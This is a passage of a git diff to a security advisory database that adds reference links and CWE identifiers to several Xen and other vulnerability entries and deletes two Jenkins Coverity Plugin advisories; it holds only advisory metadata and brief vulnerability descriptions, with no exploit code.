"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TJOMUNGW6VTK5CZZRLWLVVEOUPEQBRHI/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" @@ -52,7 +68,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-404" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/11/GHSA-2hqj-m7qj-9pc3/GHSA-2hqj-m7qj-9pc3.json b/advisories/unreviewed/2022/11/GHSA-2hqj-m7qj-9pc3/GHSA-2hqj-m7qj-9pc3.json index 67a0e0492f377..79e76754f4422 100644 --- a/advisories/unreviewed/2022/11/GHSA-2hqj-m7qj-9pc3/GHSA-2hqj-m7qj-9pc3.json +++ b/advisories/unreviewed/2022/11/GHSA-2hqj-m7qj-9pc3/GHSA-2hqj-m7qj-9pc3.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42324" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" @@ -52,7 +68,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-681" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/11/GHSA-5x8p-x36c-4gwr/GHSA-5x8p-x36c-4gwr.json b/advisories/unreviewed/2022/11/GHSA-5x8p-x36c-4gwr/GHSA-5x8p-x36c-4gwr.json index 3a728b5631a40..6679f05d5f1b0 100644 --- a/advisories/unreviewed/2022/11/GHSA-5x8p-x36c-4gwr/GHSA-5x8p-x36c-4gwr.json +++ b/advisories/unreviewed/2022/11/GHSA-5x8p-x36c-4gwr/GHSA-5x8p-x36c-4gwr.json @@ -32,6 +32,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-611", "CWE-776" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2022/11/GHSA-6xwm-7j8r-772w/GHSA-6xwm-7j8r-772w.json b/advisories/unreviewed/2022/11/GHSA-6xwm-7j8r-772w/GHSA-6xwm-7j8r-772w.json index abffa68b0cec8..87528ce2628e8 100644 --- a/advisories/unreviewed/2022/11/GHSA-6xwm-7j8r-772w/GHSA-6xwm-7j8r-772w.json +++ b/advisories/unreviewed/2022/11/GHSA-6xwm-7j8r-772w/GHSA-6xwm-7j8r-772w.json @@ -28,6 +28,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-707", "CWE-79" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2022/11/GHSA-cq56-j359-2484/GHSA-cq56-j359-2484.json b/advisories/unreviewed/2022/11/GHSA-cq56-j359-2484/GHSA-cq56-j359-2484.json index d96b67efca175..d166abfdd67e5 100644 --- a/advisories/unreviewed/2022/11/GHSA-cq56-j359-2484/GHSA-cq56-j359-2484.json +++ b/advisories/unreviewed/2022/11/GHSA-cq56-j359-2484/GHSA-cq56-j359-2484.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42322" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-f5v3-qm6r-5p3w/GHSA-f5v3-qm6r-5p3w.json b/advisories/unreviewed/2022/11/GHSA-f5v3-qm6r-5p3w/GHSA-f5v3-qm6r-5p3w.json index 392f9b0098ac2..d26796e6d1d68 100644 --- a/advisories/unreviewed/2022/11/GHSA-f5v3-qm6r-5p3w/GHSA-f5v3-qm6r-5p3w.json +++ b/advisories/unreviewed/2022/11/GHSA-f5v3-qm6r-5p3w/GHSA-f5v3-qm6r-5p3w.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42326" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-fwfg-5hqv-4r78/GHSA-fwfg-5hqv-4r78.json b/advisories/unreviewed/2022/11/GHSA-fwfg-5hqv-4r78/GHSA-fwfg-5hqv-4r78.json index 129a4fd8ba2c7..71b47aa355d84 100644 --- a/advisories/unreviewed/2022/11/GHSA-fwfg-5hqv-4r78/GHSA-fwfg-5hqv-4r78.json +++ b/advisories/unreviewed/2022/11/GHSA-fwfg-5hqv-4r78/GHSA-fwfg-5hqv-4r78.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42321" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-gvg6-g9vq-r6gw/GHSA-gvg6-g9vq-r6gw.json b/advisories/unreviewed/2022/11/GHSA-gvg6-g9vq-r6gw/GHSA-gvg6-g9vq-r6gw.json index c01f98ac50928..d3ab8f93e5a90 100644 --- a/advisories/unreviewed/2022/11/GHSA-gvg6-g9vq-r6gw/GHSA-gvg6-g9vq-r6gw.json +++ b/advisories/unreviewed/2022/11/GHSA-gvg6-g9vq-r6gw/GHSA-gvg6-g9vq-r6gw.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42323" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-gw3c-jrpr-59hg/GHSA-gw3c-jrpr-59hg.json b/advisories/unreviewed/2022/11/GHSA-gw3c-jrpr-59hg/GHSA-gw3c-jrpr-59hg.json index 842dd9569c527..220675b4adf97 100644 --- a/advisories/unreviewed/2022/11/GHSA-gw3c-jrpr-59hg/GHSA-gw3c-jrpr-59hg.json +++ b/advisories/unreviewed/2022/11/GHSA-gw3c-jrpr-59hg/GHSA-gw3c-jrpr-59hg.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42310" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-hhhj-6x4j-w995/GHSA-hhhj-6x4j-w995.json b/advisories/unreviewed/2022/11/GHSA-hhhj-6x4j-w995/GHSA-hhhj-6x4j-w995.json index a75c15e81227c..0de5c420c9a6b 100644 --- a/advisories/unreviewed/2022/11/GHSA-hhhj-6x4j-w995/GHSA-hhhj-6x4j-w995.json +++ b/advisories/unreviewed/2022/11/GHSA-hhhj-6x4j-w995/GHSA-hhhj-6x4j-w995.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1040" diff --git a/advisories/unreviewed/2022/11/GHSA-jxpc-fxw3-65cc/GHSA-jxpc-fxw3-65cc.json b/advisories/unreviewed/2022/11/GHSA-jxpc-fxw3-65cc/GHSA-jxpc-fxw3-65cc.json index ceb20c6d883ce..99f6e97886f7b 100644 --- a/advisories/unreviewed/2022/11/GHSA-jxpc-fxw3-65cc/GHSA-jxpc-fxw3-65cc.json +++ b/advisories/unreviewed/2022/11/GHSA-jxpc-fxw3-65cc/GHSA-jxpc-fxw3-65cc.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42319" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-p263-3p34-m82m/GHSA-p263-3p34-m82m.json b/advisories/unreviewed/2022/11/GHSA-p263-3p34-m82m/GHSA-p263-3p34-m82m.json index 194eef91aedef..ebe40dfeeac12 100644 --- a/advisories/unreviewed/2022/11/GHSA-p263-3p34-m82m/GHSA-p263-3p34-m82m.json +++ b/advisories/unreviewed/2022/11/GHSA-p263-3p34-m82m/GHSA-p263-3p34-m82m.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42320" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-phxq-3m6p-p9q4/GHSA-phxq-3m6p-p9q4.json b/advisories/unreviewed/2022/11/GHSA-phxq-3m6p-p9q4/GHSA-phxq-3m6p-p9q4.json index e0fa58c348d20..6b6dde1dba290 100644 --- a/advisories/unreviewed/2022/11/GHSA-phxq-3m6p-p9q4/GHSA-phxq-3m6p-p9q4.json +++ b/advisories/unreviewed/2022/11/GHSA-phxq-3m6p-p9q4/GHSA-phxq-3m6p-p9q4.json @@ -28,6 +28,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-266", "CWE-284", "CWE-434" ], diff --git a/advisories/unreviewed/2022/11/GHSA-qghj-pfv2-q8gw/GHSA-qghj-pfv2-q8gw.json b/advisories/unreviewed/2022/11/GHSA-qghj-pfv2-q8gw/GHSA-qghj-pfv2-q8gw.json index 029dd5bc70be3..159a13525ffa1 100644 --- a/advisories/unreviewed/2022/11/GHSA-qghj-pfv2-q8gw/GHSA-qghj-pfv2-q8gw.json +++ b/advisories/unreviewed/2022/11/GHSA-qghj-pfv2-q8gw/GHSA-qghj-pfv2-q8gw.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42309" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-rgfj-62rr-5vf5/GHSA-rgfj-62rr-5vf5.json b/advisories/unreviewed/2022/11/GHSA-rgfj-62rr-5vf5/GHSA-rgfj-62rr-5vf5.json index ea4580d9efcc3..249023a04848a 100644 --- a/advisories/unreviewed/2022/11/GHSA-rgfj-62rr-5vf5/GHSA-rgfj-62rr-5vf5.json +++ b/advisories/unreviewed/2022/11/GHSA-rgfj-62rr-5vf5/GHSA-rgfj-62rr-5vf5.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42327" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://xenbits.xenproject.org/xsa/advisory-412.txt" diff --git a/advisories/unreviewed/2022/11/GHSA-x7vp-fr4m-26vq/GHSA-x7vp-fr4m-26vq.json b/advisories/unreviewed/2022/11/GHSA-x7vp-fr4m-26vq/GHSA-x7vp-fr4m-26vq.json index 33d08742bad80..0ee1696c03df1 100644 --- a/advisories/unreviewed/2022/11/GHSA-x7vp-fr4m-26vq/GHSA-x7vp-fr4m-26vq.json +++ b/advisories/unreviewed/2022/11/GHSA-x7vp-fr4m-26vq/GHSA-x7vp-fr4m-26vq.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42325" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/12/GHSA-7hpg-5cp7-xr78/GHSA-7hpg-5cp7-xr78.json b/advisories/unreviewed/2022/12/GHSA-7hpg-5cp7-xr78/GHSA-7hpg-5cp7-xr78.json index 5313bac8aaf0b..7a91a1f332466 100644 --- a/advisories/unreviewed/2022/12/GHSA-7hpg-5cp7-xr78/GHSA-7hpg-5cp7-xr78.json +++ b/advisories/unreviewed/2022/12/GHSA-7hpg-5cp7-xr78/GHSA-7hpg-5cp7-xr78.json @@ -32,6 +32,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-707", "CWE-79" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2022/12/GHSA-jmmv-7567-qw22/GHSA-jmmv-7567-qw22.json b/advisories/unreviewed/2022/12/GHSA-jmmv-7567-qw22/GHSA-jmmv-7567-qw22.json index b22d314a4aff4..594b2abd51c3e 100644 --- a/advisories/unreviewed/2022/12/GHSA-jmmv-7567-qw22/GHSA-jmmv-7567-qw22.json +++ b/advisories/unreviewed/2022/12/GHSA-jmmv-7567-qw22/GHSA-jmmv-7567-qw22.json @@ -32,6 +32,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-707", "CWE-79" ], "severity": "CRITICAL", diff --git a/advisories/unreviewed/2022/12/GHSA-wfg3-85mh-2rw9/GHSA-wfg3-85mh-2rw9.json b/advisories/unreviewed/2022/12/GHSA-wfg3-85mh-2rw9/GHSA-wfg3-85mh-2rw9.json index 31d6fc4bb376c..b9f1b1ddf8c79 100644 --- a/advisories/unreviewed/2022/12/GHSA-wfg3-85mh-2rw9/GHSA-wfg3-85mh-2rw9.json +++ b/advisories/unreviewed/2022/12/GHSA-wfg3-85mh-2rw9/GHSA-wfg3-85mh-2rw9.json @@ -36,6 +36,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-707", "CWE-79" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2023/01/GHSA-5j3v-r3rh-6vh7/GHSA-5j3v-r3rh-6vh7.json b/advisories/unreviewed/2023/01/GHSA-5j3v-r3rh-6vh7/GHSA-5j3v-r3rh-6vh7.json index 3e1923d59d745..e669174a12376 100644 --- a/advisories/unreviewed/2023/01/GHSA-5j3v-r3rh-6vh7/GHSA-5j3v-r3rh-6vh7.json +++ b/advisories/unreviewed/2023/01/GHSA-5j3v-r3rh-6vh7/GHSA-5j3v-r3rh-6vh7.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40201" }, + { + "type": "WEB", + "url": "https://www.bentley.com/advisories/be-2023-0003/" + }, { "type": "WEB", "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-293-01" diff --git a/advisories/unreviewed/2023/01/GHSA-jvpr-73pr-x7v5/GHSA-jvpr-73pr-x7v5.json b/advisories/unreviewed/2023/01/GHSA-jvpr-73pr-x7v5/GHSA-jvpr-73pr-x7v5.json index e524ebf0bc308..cb97a827f5ede 100644 --- a/advisories/unreviewed/2023/01/GHSA-jvpr-73pr-x7v5/GHSA-jvpr-73pr-x7v5.json +++ b/advisories/unreviewed/2023/01/GHSA-jvpr-73pr-x7v5/GHSA-jvpr-73pr-x7v5.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42330" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://xenbits.xenproject.org/xsa/advisory-425.txt" diff --git a/advisories/unreviewed/2023/01/GHSA-mqw8-q64p-6837/GHSA-mqw8-q64p-6837.json b/advisories/unreviewed/2023/01/GHSA-mqw8-q64p-6837/GHSA-mqw8-q64p-6837.json index 171a5b7e5d609..cd2869b50a76e 100644 --- a/advisories/unreviewed/2023/01/GHSA-mqw8-q64p-6837/GHSA-mqw8-q64p-6837.json +++ b/advisories/unreviewed/2023/01/GHSA-mqw8-q64p-6837/GHSA-mqw8-q64p-6837.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41613" }, + { + "type": "WEB", + "url": "https://www.bentley.com/advisories/be-2023-0003/" + }, { "type": "WEB", "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-293-01" diff --git a/advisories/unreviewed/2023/02/GHSA-5p6c-7q82-x6c9/GHSA-5p6c-7q82-x6c9.json b/advisories/unreviewed/2023/02/GHSA-5p6c-7q82-x6c9/GHSA-5p6c-7q82-x6c9.json index 12b12bfc99813..43a095d6cc473 100644 --- a/advisories/unreviewed/2023/02/GHSA-5p6c-7q82-x6c9/GHSA-5p6c-7q82-x6c9.json +++ b/advisories/unreviewed/2023/02/GHSA-5p6c-7q82-x6c9/GHSA-5p6c-7q82-x6c9.json @@ -36,7 +36,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-121" + "CWE-121", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2023/02/GHSA-c3v2-5388-v8pw/GHSA-c3v2-5388-v8pw.json b/advisories/unreviewed/2023/02/GHSA-c3v2-5388-v8pw/GHSA-c3v2-5388-v8pw.json deleted file mode 100644 index 2c145d5c7fc55..0000000000000 --- a/advisories/unreviewed/2023/02/GHSA-c3v2-5388-v8pw/GHSA-c3v2-5388-v8pw.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-c3v2-5388-v8pw", - "modified": "2023-02-23T06:30:19Z", - "published": "2023-02-15T21:30:30Z", - "aliases": [ - "CVE-2023-23848" - ], - "details": "Missing permission checks in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23848" - }, - { - "type": "WEB", - "url": "https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-Multiple-CVEs-affecting-Coverity-Jenkins-Plugin" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-2793%20(2)" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-276" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-02-15T19:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/02/GHSA-px6v-6jhf-j46r/GHSA-px6v-6jhf-j46r.json b/advisories/unreviewed/2023/02/GHSA-px6v-6jhf-j46r/GHSA-px6v-6jhf-j46r.json deleted file mode 100644 index 84ad99638683f..0000000000000 --- a/advisories/unreviewed/2023/02/GHSA-px6v-6jhf-j46r/GHSA-px6v-6jhf-j46r.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-px6v-6jhf-j46r", - "modified": "2023-02-23T06:30:19Z", - "published": "2023-02-15T21:30:30Z", - "aliases": [ - "CVE-2023-23847" - ], - "details": "A cross-site request forgery (CSRF) vulnerability in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": 